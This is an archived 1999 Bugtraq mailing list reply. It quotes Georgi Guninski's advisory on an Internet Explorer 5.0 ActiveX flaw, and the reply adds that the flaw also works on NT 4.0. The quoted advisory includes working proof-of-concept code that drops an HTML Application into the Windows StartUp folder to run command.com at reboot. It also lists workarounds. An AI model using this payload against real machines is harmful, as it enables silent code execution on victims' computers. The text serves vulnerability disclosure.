[11502] in bugtraq
Re: IE 5.0 allows executing programs
daemon@ATHENA.MIT.EDU (Micheal Patterson)
Tue Aug 24 19:27:40 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <023c01beed2d$4e7cde30$0201a8c0@dredster.ionet.net>
Date: Mon, 23 Aug 1999 01:02:54 -0500
Reply-To: Micheal Patterson <dredster@DREDSTER.IONET.NET>
From: Micheal Patterson <dredster@DREDSTER.IONET.NET>
X-To: Georgi Guninski <joro@NAT.BG>, BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well..
Micheal Patterson
pattersonm@psi.com
----- Original Message -----
From: Georgi Guninski <joro@NAT.BG>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, August 21, 1999 11:17 AM
Subject: IE 5.0 allows executing programs
> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi
> Guninski
> is not liable for any damages caused by direct or indirect use of the
> information or functionality provided by this program.
> Georgi Guninski, bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
>
> Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
> allows executing arbitrary programs on the local machine by creating and
> overwriting local files and putting content in them.
>
> Details:
>
> The problem is the ActiveX Control "Object for constructing type
> libraries for scriptlets".
> It allows creating and overwriting local files, and more putting content
> in them.
> There is some unneeded information in the file, but part of the content
> may be chosen.
> So, an HTML Application file may be created, feeded with an exploit
> information and written to the StartUp folder.
> The next time the user reboots (which may be forced), the code in the
> HTML Application file will be executed.
> This vulnerability can be exploited via email.
>
> Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html
>
> Workaround:
> Disable Active Scripting
> or
> Disable Run ActiveX Controls and plug-ins
>
> The code is:
>
> <object id="scr"
> classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> >
> </object>
> <SCRIPT>
> scr.Reset();
> scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
> scr.Doc="<object id='wsh'
>
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Written
> by Georgi Guninski
> http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
> scr.write();
> </SCRIPT>
> </object>
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro
>
